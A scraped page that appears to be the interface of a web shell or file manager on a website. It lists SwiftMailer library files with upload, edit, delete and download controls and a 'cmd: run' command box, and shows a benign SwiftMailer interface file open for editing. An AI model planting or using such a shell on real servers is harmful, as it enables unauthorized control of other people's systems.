/
home
/
techb158
/
immovalet.com
/
vendor
/
swiftmailer
/
swiftmailer
/
lib
/
classes
/
Swift
/
/home/techb158/immovalet.com/vendor/swiftmailer/swiftmailer/lib/classes/Swift
mkdir
upload
Name
Size
Mode
Actions
AddressEncoder/
-
0755
rm
ByteStream/
-
0755
rm
CharacterReader/
-
0755
rm
CharacterReaderFactory/
-
0755
rm
CharacterStream/
-
0755
rm
Encoder/
-
0755
rm
Events/
-
0755
rm
KeyCache/
-
0755
rm
Mailer/
-
0755
rm
Mime/
-
0755
rm
Plugins/
-
0755
rm
Signers/
-
0755
rm
StreamFilters/
-
0755
rm
Transport/
-
0755
rm
AddressEncoder.php
595
0644
edit
dl
rm
AddressEncoderException.php
721
0644
edit
dl
rm
Attachment.php
1449
0644
edit
dl
rm
CharacterReader.php
1740
0644
edit
dl
rm
CharacterReaderFactory.php
542
0644
edit
dl
rm
CharacterStream.php
2158
0644
edit
dl
rm
ConfigurableSpool.php
1362
0644
edit
dl
rm
DependencyContainer.php
9928
0644
edit
dl
rm
DependencyException.php
588
0644
edit
dl
rm
EmbeddedFile.php
1407
0644
edit
dl
rm
Encoder.php
734
0644
edit
dl
rm
FailoverTransport.php
865
0644
edit
dl
rm
FileSpool.php
5620
0644
edit
dl
rm
FileStream.php
488
0644
edit
dl
rm
Filterable.php
626
0644
edit
dl
rm
IdGenerator.php
433
0644
edit
dl
rm
Image.php
1052
0644
edit
dl
rm
InputByteStream.php
1963
0644
edit
dl
rm
IoException.php
605
0644
edit
dl
rm
KeyCache.php
2802
0644
edit
dl
rm
LoadBalancedTransport.php
878
0644
edit
dl
rm
Mailer.php
2566
0644
edit
dl
rm
MemorySpool.php
2760
0644
edit
dl
rm
Message.php
7161
0644
edit
dl
rm
MimePart.php
1168
0644
edit
dl
rm
NullTransport.php
673
0644
edit
dl
rm
OutputByteStream.php
1128
0644
edit
dl
rm
Preferences.php
2225
0644
edit
dl
rm
ReplacementFilterFactory.php
549
0644
edit
dl
rm
RfcComplianceException.php
554
0644
edit
dl
rm
SendmailTransport.php
886
0644
edit
dl
rm
Signer.php
365
0644
edit
dl
rm
SmtpTransport.php
1727
0644
edit
dl
rm
Spool.php
1240
0644
edit
dl
rm
SpoolTransport.php
780
0644
edit
dl
rm
StreamFilter.php
720
0644
edit
dl
rm
SwiftException.php
601
0644
edit
dl
rm
Transport.php
2014
0644
edit
dl
rm
TransportException.php
670
0644
edit
dl
rm
Edit:
/home/techb158/immovalet.com/vendor/swiftmailer/swiftmailer/lib/classes/Swift/CharacterReader.php
(1740B)
<?php /* * This file is part of SwiftMailer. * (c) 2004-2009 Chris Corbyn * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ /** * Analyzes characters for a specific character set. * * @author Chris Corbyn * @author Xavier De Cock <xdecock@gmail.com> */ interface Swift_CharacterReader { const MAP_TYPE_INVALID = 0x01; const MAP_TYPE_FIXED_LEN = 0x02; const MAP_TYPE_POSITIONS = 0x03; /** * Returns the complete character map. * * @param string $string * @param int $startOffset * @param array $currentMap * @param mixed $ignoredChars * * @return int */ public function getCharPositions($string, $startOffset, &$currentMap, &$ignoredChars); /** * Returns the mapType, see constants. * * @return int */ public function getMapType(); /** * Returns an integer which specifies how many more bytes to read. * * A positive integer indicates the number of more bytes to fetch before invoking * this method again. * * A value of zero means this is already a valid character. * A value of -1 means this cannot possibly be a valid character. * * @param int[] $bytes * @param int $size * * @return int */ public function validateByteSequence($bytes, $size); /** * Returns the number of bytes which should be read to start each character. * * For fixed width character sets this should be the number of octets-per-character. * For multibyte character sets this will probably be 1. * * @return int */ public function getInitialByteSize(); }
Save
cmd:
run